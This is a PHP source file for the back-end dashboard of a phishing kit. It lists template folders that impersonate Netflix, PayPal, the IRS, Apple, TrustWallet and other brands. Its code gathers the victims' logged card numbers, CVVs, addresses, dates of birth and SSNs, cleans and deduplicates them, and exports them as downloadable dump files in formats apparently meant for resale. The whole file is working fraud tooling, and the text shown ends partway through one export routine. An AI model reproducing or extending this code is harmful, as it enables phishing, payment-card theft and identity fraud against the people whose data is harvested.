<?php
/**
* WebShop - Premium Dashboard
* Design: CIPHER TERMINAL - Neo-Cyberpunk Interface
* Adapted for GlobalSetting
*/

// Suppress errors
error_reporting(E_ALL);
ini_set('display_errors', 1);

// Cookie-based authentication check
$cookieName = 'gs_auth_token';
function wsVerifyAuth() {
    $secret = 'GlobalSetting2024SecretKey';
    $token = $_COOKIE['gs_auth_token'] ?? '';
    $username = $_COOKIE['gs_username'] ?? '';
    return $token === hash('sha256', $username . $secret . date('Y-m-d'));
}

if (!isset($_COOKIE[$cookieName]) || !wsVerifyAuth()) {
    header('Location: index.php');
    exit;
}

// Initialize BEFORE any output
$basePath = dirname(__DIR__);

// Helper function to clean CC data line
function cleanWebshopLineDownload($line) {
    $line = trim($line);
    if (empty($line)) return null;
    if (strpos($line, 'Card Submitted') !== false) return null;
    if (preg_match('/^\d{4}-\d{2}-\d{2}\s+\d{2}:\d{2}:\d{2}\|/', $line)) return null;
    
    // Skip BIN lookup data (format: timestamp|IP|name|BIN6|issuer|scheme|type|country)
    // These lines have 6-digit BIN and words like VISA, MASTERCARD, CREDIT, DEBIT
    if (preg_match('/^\d{14}\|[\d\.]+\|[^|]+\|\d{6}\|/i', $line)) {
        return null; // This is bin.txt data, not CC data
    }
    
    // Skip lines that look like BIN data (IP|name|6-digit|issuer|brand|type|country)
    if (preg_match('/^[\d\.]+\|[^|]+\|\d{6}\|[^|]+\|(VISA|MASTERCARD|AMEX|DISCOVER)/i', $line)) {
        return null; // This is bin.txt data without timestamp
    }
    
    // Remove malformed timestamp at start (like "16584402032026|" -> timestamp without separators)
    if (preg_match('/^\d{14}\|/', $line)) {
        $line = preg_replace('/^\d{14}\|/', '', $line);
    }
    
    // Remove properly formatted timestamp at start (H:i:s m-d-Y|)
    if (preg_match('/^\d{2}:\d{2}:\d{2}\s+\d{2}-\d{2}-\d{4}\|/', $line)) {
        $line = preg_replace('/^\d{2}:\d{2}:\d{2}\s+\d{2}-\d{2}-\d{4}\|/', '', $line);
    }
    
    // Remove domain prefix if exists
    if (preg_match('/^[a-zA-Z0-9][a-zA-Z0-9\-\.]+\.[a-zA-Z]{2,}\|(.+)$/', $line, $matches)) {
        $line = $matches[1];
    }
    
    // Fix Netflix format: remove leading pipe if line starts with |
    if (strpos($line, '|') === 0) {
        $line = substr($line, 1);
    }
    
    // Final validation: CC data should start with card number (13-19 digits)
    $parts = explode('|', $line);
    $firstField = preg_replace('/\D/', '', $parts[0] ?? '');
    if (strlen($firstField) < 15 || strlen($firstField) > 16) {
        return null; // Not valid CC data
    }
    
    return $line;
}

// Template folders mapping
$templateFolders = [
    'secure-3' => 'Netflix',
    'irjBhq6Esw' => 'Disney+',
    'hzvQTruKBa' => 'Xfinity',
    'sspectrum' => 'Spectrum',
    'U1IimACP7W' => 'PayPal',
    'KsR7xiySIj' => 'Breezeline',
    'MaIMTt67dp' => 'DVLA/Govuk',
    'zMEDH3rzcM' => 'Apple',
    'DXNEbwZqcG' => 'AT&T',
    'cmrU0tg7dN' => 'TrustWallet',
    'secure-2' => 'IRS',
    'etmin' => 'Etmin',
];

// Handle download - Export ALL data
if (isset($_GET['download']) && $_GET['download'] === 'txt') {
    @set_time_limit(300); // 5 minutes timeout
    @ini_set('memory_limit', '256M');
    while (ob_get_level()) ob_end_clean();
    
    $filename = 'all_cc_data_' . date('Y-m-d_H-i-s') . '.txt';
    header('Content-Type: text/plain; charset=utf-8');
    header('Content-Disposition: attachment; filename="' . $filename . '"');
    header('Cache-Control: no-cache, must-revalidate');
    
    $allData = [];
    
    foreach ($templateFolders as $folder => $name) {
        $logPaths = [
            $basePath . '/' . $folder . '/logs/data_webshop_logs.txt',
        ];
        
        foreach ($logPaths as $logPath) {
            if (file_exists($logPath) && filesize($logPath) > 0) {
                $lines = @file($logPath, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
                if ($lines) {
                    foreach ($lines as $line) {
                        $clean = cleanWebshopLineDownload($line);
                        if ($clean) $allData[] = $clean;
                    }
                }
            }
        }
    }
    
    $allData = array_filter(array_unique($allData));
    echo !empty($allData) ? implode("\n", $allData) : "No data available.";
    exit;
}

// Handle Clean & Download All
if (isset($_GET['download']) && $_GET['download'] === 'clean_all') {
    @set_time_limit(300); // 5 minutes timeout
    @ini_set('memory_limit', '256M');
    while (ob_get_level()) ob_end_clean();
    
    $allData = [];
    
    $validateLine = function($line) {
        $line = trim($line);
        if (empty($line)) return false;
        if (stripos($line, 'Card Submitted') !== false) return false;
        if (preg_match('/^\d{4}-\d{2}-\d{2}/', $line)) return false;
        if (preg_match('/^[a-z0-9-]+\.(lazarus|credit|server)\|/i', $line)) {
            $line = preg_replace('/^[a-z0-9-]+\.(lazarus|credit|server)\|/i', '', $line);
        }
        
        // Fix Netflix format: remove leading pipe if line starts with |
        if (strpos($line, '|') === 0) {
            $line = substr($line, 1);
        }
        
        $parts = explode('|', $line);
        if (count($parts) < 8) return false;
        
        $cc = preg_replace('/\D/', '', $parts[0]);
        if (strlen($cc) < 15 || strlen($cc) > 16) return false;
        
        $mm = trim($parts[1]);
        if (!preg_match('/^(0[1-9]|1[0-2])$/', $mm)) return false;
        
        $yy = trim($parts[2]);
        if (!preg_match('/^\d{2}$/', $yy)) return false;
        
        $cvv = trim($parts[3]);
        if (!preg_match('/^\d{3,4}$/', $cvv)) return false;
        
        return $line;
    };
    
    foreach ($templateFolders as $folder => $name) {
        $logPaths = [
            $basePath . '/' . $folder . '/logs/data_webshop_logs.txt',
        ];
        
        foreach ($logPaths as $logPath) {
            if (file_exists($logPath)) {
                $lines = @file($logPath, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
                if ($lines) {
                    foreach ($lines as $line) {
                        $clean = $validateLine($line);
                        if ($clean) $allData[] = $clean;
                    }
                }
            }
        }
    }
    
    // Remove duplicates by CC number
    $uniqueData = [];
    foreach ($allData as $line) {
        $parts = explode('|', $line);
        $ccKey = preg_replace('/\D/', '', $parts[0]);
        if (!isset($uniqueData[$ccKey])) {
            $uniqueData[$ccKey] = $line;
        }
    }
    $cleanedData = array_values($uniqueData);
    
    $filename = 'cc_cleaned_' . date('Y-m-d_H-i-s') . '.txt';
    header('Content-Type: text/plain; charset=utf-8');
    header('Content-Disposition: attachment; filename="' . $filename . '"');
    
    echo !empty($cleanedData) ? implode("\n", $cleanedData) : "No valid CC data found.";
    exit;
}

// Handle Export No SSN
if (isset($_GET['download']) && $_GET['download'] === 'no_ssn') {
    @set_time_limit(300); // 5 minutes timeout
    @ini_set('memory_limit', '256M');
    while (ob_get_level()) ob_end_clean();
    
    $allData = [];
    
    foreach ($templateFolders as $folder => $name) {
        $logPaths = [
            $basePath . '/' . $folder . '/logs/data_webshop_logs.txt',
        ];
        
        foreach ($logPaths as $logPath) {
            if (file_exists($logPath)) {
                $lines = @file($logPath, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
                if ($lines) {
                    foreach ($lines as $line) {
                        $clean = cleanWebshopLineDownload($line);
                        if ($clean) $allData[] = $clean;
                    }
                }
            }
        }
    }
    
    $allData = array_unique($allData);
    
    // Remove SSN and clean empty pipes
    $noSsnData = [];
    foreach ($allData as $line) {
        $parts = explode('|', $line);
        if (count($parts) < 10) continue;
        
        // Remove SSN field (index 13) if exists
        if (isset($parts[13])) {
            unset($parts[13]);
        }
        
        // Re-index array after removing SSN
        $parts = array_values($parts);
        
        // Keep empty fields as || (don't clean them - maintains field positions)
        $cleaned = implode('|', $parts);
        $cleaned = rtrim($cleaned, '|') . '|'; // Ensure trailing pipe
        
        if (!empty($cleaned)) {
            $noSsnData[] = $cleaned;
        }
    }
    
    $filename = 'cc_no_ssn_' . date('Y-m-d_H-i-s') . '.txt';
    header('Content-Type: text/plain; charset=utf-8');
    header('Content-Disposition: attachment; filename="' . $filename . '"');
    
    echo !empty($noSsnData) ? implode("\n", $noSsnData) : "No data available.";
    exit;
}

// ============================================
// BRIANS FORMAT - Helper function for clean field
// ============================================
function briansCleanField($val) {
    $val = trim($val ?? '');
    $val = str_replace('|', ' ', $val); // Remove pipes from inside values
    $val = preg_replace('/\s+/', ' ', $val); // Multiple spaces to single
    // Don't put N/A, NULL, etc - leave empty
    if (strtoupper($val) === 'N/A' || strtoupper($val) === 'NULL' || strtoupper($val) === 'NA' || $val === '-') {
        return '';
    }
    return $val;
}

// ============================================
// BRIANS FORMAT - Smart extract email, ip, ua from parts array
// Handles varying data formats where positions may shift
// ============================================
function briansExtractEmailIpUa($parts) {
    $email = '';
    $ip = '';
    $ua = '';
    
    // Search from index 11 onwards for email, ip, ua
    for ($i = 11; $i < count($parts); $i++) {
        $val = trim($parts[$i] ?? '');
        if (empty($val)) continue;
        
        // Detect Email (contains @)
        if (empty($email) && strpos($val, '@') !== false && preg_match('/^[^@]+@[^@]+\.[^@]+$/', $val)) {
            $email = $val;
            continue;
        }
        
        // Detect IP (x.x.x.x format)
        if (empty($ip) && preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/', $val)) {
            $ip = $val;
            continue;
        }
        
        // Detect User Agent (contains Mozilla, Safari, Chrome, etc or long string with browser info)
        if (empty($ua) && (
            stripos($val, 'Mozilla') !== false ||
            stripos($val, 'Safari') !== false ||
            stripos($val, 'Chrome') !== false ||
            stripos($val, 'Firefox') !== false ||
            stripos($val, 'Edge') !== false ||
            stripos($val, 'Opera') !== false ||
            stripos($val, 'MSIE') !== false ||
            stripos($val, 'Trident') !== false ||
            stripos($val, 'AppleWebKit') !== false ||
            (strlen($val) > 50 && stripos($val, 'like') !== false)
        )) {
            $ua = $val;
            continue;
        }
    }
    
    return ['email' => $email, 'ip' => $ip, 'ua' => $ua];
}

// Helper: read all logs, dedup, parse fields
function getAllCards() {
    global $templateFolders, $basePath;
    $allData = [];
    foreach ($templateFolders as $folder => $name) {
        $logPath = $basePath . '/' . $folder . '/logs/data_webshop_logs.txt';
        if (file_exists($logPath) && filesize($logPath) > 0) {
            $lines = @file($logPath, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
            if ($lines) {
                foreach ($lines as $line) {
                    $clean = cleanWebshopLineDownload($line);
                    if ($clean) $allData[] = $clean;
                }
            }
        }
    }
    $uniqueCards = [];
    $seenCards = [];
    foreach ($allData as $line) {
        $parts = explode('|', $line);
        $cardNum = preg_replace('/\D/', '', $parts[0] ?? '');
        if (strlen($cardNum) >= 15 && !isset($seenCards[$cardNum])) {
            $seenCards[$cardNum] = true;
            $uniqueCards[] = $parts;
        }
    }
    $result = [];
    foreach ($uniqueCards as $parts) {
        $card = briansCleanField($parts[0] ?? '');
        $cardClean = preg_replace('/\D/', '', $card);
        if (strlen($cardClean) < 15 || strlen($cardClean) > 16) continue;
        $mm = briansCleanField($parts[1] ?? '');
        $yy = briansCleanField($parts[2] ?? '');
        if (!empty($mm) && !empty($yy)) {
            $mm = str_pad(preg_replace('/\D/', '', $mm), 2, '0', STR_PAD_LEFT);
            $yy = preg_replace('/\D/', '', $yy);
            if (strlen($yy) === 4) $yy = substr($yy, -2);
            $yy = str_pad($yy, 2, '0', STR_PAD_LEFT);
        }
        $ext = briansExtractEmailIpUa($parts);
        $result[] = [
            'card' => $cardClean, 'mm' => $mm, 'yy' => $yy,
            'cvv' => briansCleanField($parts[3] ?? ''),
            'name' => briansCleanField($parts[4] ?? ''),
            'address' => briansCleanField($parts[5] ?? ''),
            'city' => briansCleanField($parts[6] ?? ''),
            'state' => briansCleanField($parts[7] ?? ''),
            'zip' => briansCleanField($parts[8] ?? ''),
            'country' => briansCleanField($parts[9] ?? ''),
            'phone' => briansCleanField($parts[10] ?? ''),
            'dob' => briansCleanField($parts[11] ?? ''),
            'ssn' => briansCleanField($parts[12] ?? ''),
            'email' => briansCleanField($ext['email']),
            'ip' => briansCleanField($ext['ip']),
            'ua' => briansCleanField($ext['ua']),
        ];
    }
    return $result;
}

// BRIANS - No SSN
if (isset($_GET['download']) && $_GET['download'] === 'brians_no_ssn') {
    @set_time_limit(300); @ini_set('memory_limit', '256M'); while (ob_get_level()) ob_end_clean();
    $cards = getAllCards();
    $lines = [];
    foreach ($cards as $c) {
        $lines[] = implode('|', [$c['card'], $c['mm'], $c['yy'], $c['cvv'], $c['name'], $c['address'], $c['city'], $c['state'], $c['zip'], $c['country'], $c['phone'], $c['email'], $c['dob'], '', $c['ip'], $c['ua']]) . '|';
    }
    header('Content-Type: text/plain; charset=utf-8');
    header('Content-Disposition: attachment; filename="brians_no_ssn_' . date('Y-m-d_H-i-s') . '.txt"');
    echo implode("\n", array_unique($lines));
    exit;
}

// BRIANS - With SSN
if (isset($_GET['download']) && $_GET['download'] === 'brians_ssn') {
    @set_time_limit(300); @ini_set('memory_limit', '256M'); while (ob_get_level()) ob_end_clean();
    $cards = getAllCards();
    $lines = [];
    foreach ($cards as $c) {
        $lines[] = implode('|', [$c['card'], $c['mm'], $c['yy'], $c['cvv'], $c['name'], $c['address'], $c['city'], $c['state'], $c['zip'], $c['country'], $c['phone'], $c['email'], $c['dob'], $c['ssn'], $c['ip'], $c['ua']]) . '|';
    }
    header('Content-Type: text/plain; charset=utf-8');
    header('Content-Disposition: attachment; filename="brians_ssn_' . date('Y-m-d_H-i-s') . '.txt"');
    echo implode("\n", array_unique($lines));
    exit;
}

// CERBERUX - No SSN
if (isset($_GET['download']) && $_GET['download'] === 'cerberux_no_ssn') {
    @set_time_limit(300); @ini_set('memory_limit', '256M'); while (ob_get_level()) ob_end_clean();
    $cards = getAllCards();
    $lines = [];
    foreach ($cards as $c) {
        $lines[] = implode('|', [$c['card'], $c['mm'], $c['yy'], $c['cvv'], $c['name'], $c['address'], $c['city'], $c['state'], $c['zip'], $c['country'], $c['phone'], $c['dob'], '', $c['email'], $c['ip'], $c['ua']]) . '|';
    }
    header('Content-Type: text/plain; charset=utf-8');
    header('Content-Disposition: attachment; filename="cerberux_no_ssn_' . date('Y-m-d_H-i-s') . '.txt"');
    echo implode("\n", array_unique($lines));
    exit;
}

// CERBERUX - With SSN
if (isset($_GET['download']) && $_GET['download'] === 'cerberux_ssn') {
    @set_time_limit(300); @ini_set('memory_limit', '256M'); while (ob_get_level()) ob_end_clean();
    $cards = getAllCards();
    $lines = [];
    foreach ($cards as $c) {
        $lines[] = implode('|', [$c['card'], $c['mm'], $c['yy'], $c['cvv'], $c['name'], $c['address'], $c['city'], $c['state'], $c['zip'], $c['country'], $c['phone'], $c['dob'], $c['ssn'], $c['email'], $c['ip'], $c['ua']]) . '|';
    }
    header('Content-Type: text/plain; charset=utf-8');
    header('Content-Disposition: attachment; filename="cerberux_ssn_' . date('Y-m-d_H-i-s') . '.txt"');
    echo implode("\n", array_unique($lines));
    exit;
}

// OLD EXPORTS REMOVED - replaced by no_ssn_clean and ssn_clean above
// ============================================
if (false) { // DISABLED - kept for reference only
if (isset($_GET['download']) && $_GET['download'] === 'brians_clean_no_ssn') {
    @set_time_limit(300);
    @ini_set('memory_limit', '256M');
    while (ob_get_level()) ob_end_clean();
    
    $allData = [];
    $cleanupStats = ['files' => 0, 'original' => 0, 'cleaned' => 0, 'timestamp' => 0, 'invalid' => 0];
    
    // Deep clean function untuk hapus timestamp dan format rusak
    $deepCleanLine = function($line) use (&$cleanupStats) {
        $line = trim($line);
        if (empty($line)) return null;
        
        // Remove "Card Submitted" entries
        if (stripos($line, 'Card Submitted') !== false) {
            $cleanupStats['invalid']++;
            return null;
        }
        
        // Remove timestamp entries (e.g., 2024-01-15 12:30:45|...)
        if (preg_match('/^\d{4}-\d{2}-\d{2}\s*\d{2}:\d{2}:\d{2}\|/', $line)) {
            $cleanupStats['timestamp']++;
            return null;
        }
        if (preg_match('/^\d{4}-\d{2}-\d{2}\|/', $line)) {
            $cleanupStats['timestamp']++;
            return null;
        }
        
        // Remove domain prefix (e.g., example.com|...)
        if (preg_match('/^[a-zA-Z0-9][a-zA-Z0-9\-\.]+\.[a-zA-Z]{2,}\|(.+)$/', $line, $matches)) {
            $line = $matches[1];
        }
        
        // Fix leading pipe
        if (strpos($line, '|') === 0) {
            $line = substr($line, 1);
        }
        
        // Check if line has valid card number at start
        $parts = explode('|', $line);
        $cardNum = preg_replace('/\D/', '', $parts[0] ?? '');
        if (strlen($cardNum) < 15 || strlen($cardNum) > 16) {
            $cleanupStats['invalid']++;
            return null;
        }
        
        return $line;
    };
    
    foreach ($templateFolders as $folder => $name) {
        $logPaths = [
            $basePath . '/' . $folder . '/logs/data_webshop_logs.txt',
        ];
        
        foreach ($logPaths as $logPath) {
            if (file_exists($logPath) && filesize($logPath) > 0) {
                $lines = @file($logPath, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
                if ($lines && count($lines) > 0) {
                    $cleanupStats['files']++;
                    $cleanupStats['original'] += count($lines);
                    
                    // Step 1: Deep clean (remove timestamp, invalid format)
                    $cleanedLines = [];
                    foreach ($lines as $line) {
                        $cleaned = $deepCleanLine($line);
                        if ($cleaned) $cleanedLines[] = $cleaned;
                    }
                    
                    // Step 2: Remove duplicates
                    $uniqueLines = [];
                    $seenHashes = [];
                    foreach ($cleanedLines as $line) {
                        $hash = md5(trim($line));
                        if (!isset($seenHashes[$hash])) {
                            $seenHashes[$hash] = true;
                            $uniqueLines[] = $line;
                        }
                    }
                    
                    // Save cleaned file back
                    if (count($uniqueLines) < count($lines)) {
                        file_put_contents($logPath, implode(PHP_EOL, $uniqueLines) . PHP_EOL);
                    }
                    $cleanupStats['cleaned'] += count($uniqueLines);
                    
                    foreach ($uniqueLines as $line) {
                        $clean = cleanWebshopLineDownload($line);
                        if ($clean) $allData[] = $clean;
                    }
                }
            }
        }
    }
    
    // Remove duplicates based on card number
    $uniqueCards = [];
    $seenCards = [];
    foreach ($allData as $line) {
        $parts = explode('|', $line);
        $cardNum = preg_replace('/\D/', '', $parts[0] ?? '');
        if (strlen($cardNum) >= 15 && !isset($seenCards[$cardNum])) {
            $seenCards[$cardNum] = true;
            $uniqueCards[] = $line;
        }
    }
    
    $briansData = [];
    
    foreach ($uniqueCards as $line) {
        $parts = explode('|', $line);
        
        $cardNumber = briansCleanField($parts[0] ?? '');
        $expMonth = briansCleanField($parts[1] ?? '');
        $expYear = briansCleanField($parts[2] ?? '');
        $cvv = briansCleanField($parts[3] ?? '');
        $name = briansCleanField($parts[4] ?? '');
        $address = briansCleanField($parts[5] ?? '');
        $city = briansCleanField($parts[6] ?? '');
        $state = briansCleanField($parts[7] ?? '');
        $zip = briansCleanField($parts[8] ?? '');
        $country = briansCleanField($parts[9] ?? '');
        $phone = briansCleanField($parts[10] ?? '');
        $dob = briansCleanField($parts[11] ?? '');
        
        // Smart extract email, ip, ua (handles varying positions)
        $extracted = briansExtractEmailIpUa($parts);
        $email = briansCleanField($extracted['email']);
        $ip = briansCleanField($extracted['ip']);
        $ua = briansCleanField($extracted['ua']);
        
        $cardClean = preg_replace('/\D/', '', $cardNumber);
        if (strlen($cardClean) < 15 || strlen($cardClean) > 16) continue;
        
        $expDate = '';
        if (!empty($expMonth) && !empty($expYear)) {
            $expMonth = str_pad(preg_replace('/\D/', '', $expMonth), 2, '0', STR_PAD_LEFT);
            $expYear = preg_replace('/\D/', '', $expYear);
            if (strlen($expYear) === 4) $expYear = substr($expYear, -2);
            $expYear = str_pad($expYear, 2, '0', STR_PAD_LEFT);
            $expDate = $expMonth . '|' . $expYear;
        }
        
        // Build line - keep empty fields as ||
        $briansLine = implode('|', [
            $cardClean, $expDate, $cvv, $name, $address, $city, $state, $zip, $country, $phone, $email, $dob, '', $ip, $ua
        ]) . '|';
        
        // Keep empty fields as || - maintains consistent field positions
        $briansLine = rtrim($briansLine, '|') . '|'; // Ensure trailing pipe
        
        $briansData[] = $briansLine;
    }
    
    $briansData = array_unique($briansData);
    
    $filename = 'brians_clean_' . date('Y-m-d_H-i-s') . '.txt';
    header('Content-Type: text/plain; charset=utf-8');
    header('Content-Disposition: attachment; filename="' . $filename . '"');
    
    $output = "# Full Cleanup: Files={$cleanupStats['files']}, Original={$cleanupStats['original']}, Clean={$cleanupStats['cleaned']}, Timestamp={$cleanupStats['timestamp']}, Invalid={$cleanupStats['invalid']}\n";
    $output .= "# Format: card|mm|yy|cvv|name|address|city|state|zip|country|phone|email|dob|ip|ua (no SSN, empty || removed)\n";
    $output .= !empty($briansData) ? implode("\n", $briansData) : "No data available.";
    
    echo $output;
    exit;
}

// ============================================
// BRIANS CLEAN WITH SSN - Full cleanup + Export dengan SSN
// ============================================
if (isset($_GET['download']) && $_GET['download'] === 'brians_clean_ssn') {
    @set_time_limit(300);
    @ini_set('memory_limit', '256M');
    while (ob_get_level()) ob_end_clean();
    
    $allData = [];
    $cleanupStats = ['files' => 0, 'original' => 0, 'cleaned' => 0, 'timestamp' => 0, 'invalid' => 0];
    
    $deepCleanLine = function($line) use (&$cleanupStats) {
        $line = trim($line);
        if (empty($line)) return null;
        
        if (stripos($line, 'Card Submitted') !== false) {
            $cleanupStats['invalid']++;
            return null;
        }
        
        if (preg_match('/^\d{4}-\d{2}-\d{2}\s*\d{2}:\d{2}:\d{2}\|/', $line)) {
            $cleanupStats['timestamp']++;
            return null;
        }
        if (preg_match('/^\d{4}-\d{2}-\d{2}\|/', $line)) {
            $cleanupStats['timestamp']++;
            return null;
        }
        
        if (preg_match('/^[a-zA-Z0-9][a-zA-Z0-9\-\.]+\.[a-zA-Z]{2,}\|(.+)$/', $line, $matches)) {
            $line = $matches[1];
        }
        
        if (strpos($line, '|') === 0) {
            $line = substr($line, 1);
        }
        
        $parts = explode('|', $line);
        $cardNum = preg_replace('/\D/', '', $parts[0] ?? '');
        if (strlen($cardNum) < 15 || strlen($cardNum) > 16) {
            $cleanupStats['invalid']++;
            return null;
        }
        
        return $line;
    };
    
    foreach ($templateFolders as $folder => $name) {
        $logPaths = [
            $basePath . '/' . $folder . '/logs/data_webshop_logs.txt',
        ];
        
        foreach ($logPaths as $logPath) {
            if (file_exists($logPath) && filesize($logPath) > 0) {
                $lines = @file($logPath, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
                if ($lines && count($lines) > 0) {
                    $cleanupStats['files']++;
                    $cleanupStats['original'] += count($lines);
                    
                    $cleanedLines = [];
                    foreach ($lines as $line) {
                        $cleaned = $deepCleanLine($line);
                        if ($cleaned) $cleanedLines[] = $cleaned;
                    }
                    
                    $uniqueLines = [];
                    $seenHashes = [];
                    foreach ($cleanedLines as $line) {
                        $hash = md5(trim($line));
                        if (!isset($seenHashes[$hash])) {
                            $seenHashes[$hash] = true;
                            $uniqueLines[] = $line;
                        }
                    }
                    
                    if (count($uniqueLines) < count($lines)) {
                        file_put_contents($logPath, implode(PHP_EOL, $uniqueLines) . PHP_EOL);
                    }
                    $cleanupStats['cleaned'] += count($uniqueLines);
                    
                    foreach ($uniqueLines as $line) {
                        $clean = cleanWebshopLineDownload($line);
                        if ($clean) $allData[] = $clean;
                    }
                }
            }
        }
    }
    
    $uniqueCards = [];
    $seenCards = [];
    foreach ($allData as $line) {
        $parts = explode('|', $line);
        $cardNum = preg_replace('/\D/', '', $parts[0] ?? '');
        if (strlen($cardNum) >= 15 && !isset($seenCards[$cardNum])) {
            $seenCards[$cardNum] = true;
            $uniqueCards[] = $line;
        }
    }
    
    $briansData = [];
    
    foreach ($uniqueCards as $line) {
        $parts = explode('|', $line);
        
        $cardNumber = briansCleanField($parts[0] ?? '');
        $expMonth = briansCleanField($parts[1] ?? '');
        $expYear = briansCleanField($parts[2] ?? '');
        $cvv = briansCleanField($parts[3] ?? '');
        $name = briansCleanField($parts[4] ?? '');
        $address = briansCleanField($parts[5] ?? '');
        $city = briansCleanField($parts[6] ?? '');
        $state = briansCleanField($parts[7] ?? '');
        $zip = briansCleanField($parts[8] ?? '');
        $country = briansCleanField($parts[9] ?? '');
        $phone = briansCleanField($parts[10] ?? '');
        $dob = briansCleanField($parts[11] ?? '');
        $ssn = briansCleanField($parts[12] ?? ''); // Include SSN
        
        $extracted = briansExtractEmailIpUa($parts);
        $email = briansCleanField($extracted['email']);
        $ip = briansCleanField($extracted['ip']);
        $ua = briansCleanField($extracted['ua']);
        
        $cardClean = preg_replace('/\D/', '', $cardNumber);
        if (strlen($cardClean) < 15 || strlen($cardClean) > 16) continue;
        
        $expDate = '';
        if (!empty($expMonth) && !empty($expYear)) {
            $expMonth = str_pad(preg_replace('/\D/', '', $expMonth), 2, '0', STR_PAD_LEFT);
            $expYear = preg_replace('/\D/', '', $expYear);
            if (strlen($expYear) === 4) $expYear = substr($expYear, -2);
            $expYear = str_pad($expYear, 2, '0', STR_PAD_LEFT);
            $expDate = $expMonth . '|' . $expYear;
        }
        
        // Format with SSN: card|mm|yy|cvv|name|address|city|state|zip|country|phone|email|dob|ssn|ip|ua
        $briansLine = implode('|', [
            $cardClean, $expDate, $cvv, $name, $address, $city, $state, $zip, $country, $phone, $email, $dob, $ssn, $ip, $ua
        ]) . '|';
        
        // Keep empty fields as || - maintains consistent field positions
        $briansLine = rtrim($briansLine, '|') . '|';
        
        $briansData[] = $briansLine;
    }
    
    $briansData = array_unique($briansData);
    
    $filename = 'brians_clean_ssn_' . date('Y-m-d_H-i-s') . '.txt';
    header('Content-Type: text/plain; charset=utf-8');
    header('Content-Disposition: attachment; filename="' . $filename . '"');
    
    $output = "# Full Cleanup: Files={$cleanupStats['files']}, Original={$cleanupStats['original']}, Clean={$cleanupStats['cleaned']}, Timestamp={$cleanupStats['timestamp']}, Invalid={$cleanupStats['invalid']}\n";
    $output .= "# Format: card|mm|yy|cvv|name|address|city|state|zip|country|phone|email|dob|ssn|ip|ua (with SSN, empty || removed)\n";
    $output .= !empty($briansData) ? implode("\n", $briansData) : "No data available.";
    
    echo $output;
    exit;
}

// ============================================
// BRIANS NO SSN - Cleanup + Export
// Clean log files AND export Brians format without SSN
// ============================================
if (isset($_GET['download']) && $_GET['download'] === 'cleanup_brians_no_ssn') {
    @set_time_limit(300);
    @ini_set('memory_limit', '256M');
    while (ob_get_level()) ob_end_clean();
    
    $allData = [];
    $cleanupStats = ['files' => 0, 'original' => 0, 'cleaned' => 0];
    
    foreach ($templateFolders as $folder => $name) {
        $logPaths = [
            $basePath . '/' . $folder . '/logs/data_webshop_logs.txt',
        ];
        
        foreach ($logPaths as $logPath) {
            if (file_exists($logPath) && filesize($logPath) > 0) {
                $lines = @file($logPath, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
                if ($lines && count($lines) > 0) {
                    $cleanupStats['files']++;
                    $cleanupStats['original'] += count($lines);
                    
                    // Remove duplicates from file
                    $uniqueLines = [];
                    $seenHashes = [];
                    foreach ($lines as $line) {
                        $hash = md5(trim($line));
                        if (!isset($seenHashes[$hash])) {
                            $seenHashes[$hash] = true;
                            $uniqueLines[] = $line;
                        }
                    }
                    
                    // Save cleaned file
                    if (count($uniqueLines) < count($lines)) {
                        file_put_contents($logPath, implode(PHP_EOL, $uniqueLines) . PHP_EOL);
                    }
                    $cleanupStats['cleaned'] += count($uniqueLines);
                    
                    // Collect for export
                    foreach ($uniqueLines as $line) {
                        $clean = cleanWebshopLineDownload($line);
                        if ($clean) $allData[] = $clean;
                    }
                }
            }
        }
    }
    
    // Remove duplicates based on card number for export
    $uniqueCards = [];
    $seenCards = [];
    foreach ($allData as $line) {
        $parts = explode('|', $line);
        $cardNum = preg_replace('/\D/', '', $parts[0] ?? '');
        if (strlen($cardNum) >= 15 && !isset($seenCards[$cardNum])) {
            $seenCards[$cardNum] = true;
            $uniqueCards[] = $line;
        }
    }
    
    $briansData = [];
    
    foreach ($uniqueCards as $line) {
        $parts = explode('|', $line);
        
        $cardNumber = briansCleanField($parts[0] ?? '');
        $expMonth = briansCleanField($parts[1] ?? '');
        $expYear = briansCleanField($parts[2] ?? '');
        $cvv = briansCleanField($parts[3] ?? '');
        $name = briansCleanField($parts[4] ?? '');
        $address = briansCleanField($parts[5] ?? '');
        $city = briansCleanField($parts[6] ?? '');
        $state = briansCleanField($parts[7] ?? '');
        $zip = briansCleanField($parts[8] ?? '');
        $country = briansCleanField($parts[9] ?? '');
        $phone = briansCleanField($parts[10] ?? '');
        $dob = briansCleanField($parts[11] ?? '');
        
        // Smart extract email, ip, ua (handles varying positions)
        $extracted = briansExtractEmailIpUa($parts);
        $email = briansCleanField($extracted['email']);
        $ip = briansCleanField($extracted['ip']);
        $ua = briansCleanField($extracted['ua']);
        
        $cardClean = preg_replace('/\D/', '', $cardNumber);
        if (strlen($cardClean) < 15 || strlen($cardClean) > 16) continue;
        
        $expDate = '';
        if (!empty($expMonth) && !empty($expYear)) {
            $expMonth = str_pad(preg_replace('/\D/', '', $expMonth), 2, '0', STR_PAD_LEFT);
            $expYear = preg_replace('/\D/', '', $expYear);
            if (strlen($expYear) === 4) $expYear = substr($expYear, -2);
            $expYear = str_pad($expYear, 2, '0', STR_PAD_LEFT);
            $expDate = $expMonth . '|' . $expYear;
        }
        
        $briansLine = implode('|', [
            $cardClean, $expDate, $cvv, $name, $address, $city, $state, $zip, $country, $phone, $email, $dob, '', $ip, $ua
        ]) . '|';
        
        $briansData[] = $briansLine;
    }
    
    $briansData = array_unique($briansData);
    
    $filename = 'brians_cleaned_no_ssn_' . date('Y-m-d_H-i-s') . '.txt';
    header('Content-Type: text/plain; charset=utf-8');
    header('Content-Disposition: attachment; filename="' . $filename . '"');
    
    $output = "# Cleanup Stats: Files={$cleanupStats['files']}, Original={$cleanupStats['original']}, After Cleanup={$cleanupStats['cleaned']}, Removed=" . ($cleanupStats['original'] - $cleanupStats['cleaned']) . "\n";
    $output .= "card_number|MM|YY|cvv|name|address|city|state|zip|country|phone|email|dob|ssn|ip|ua|\n";
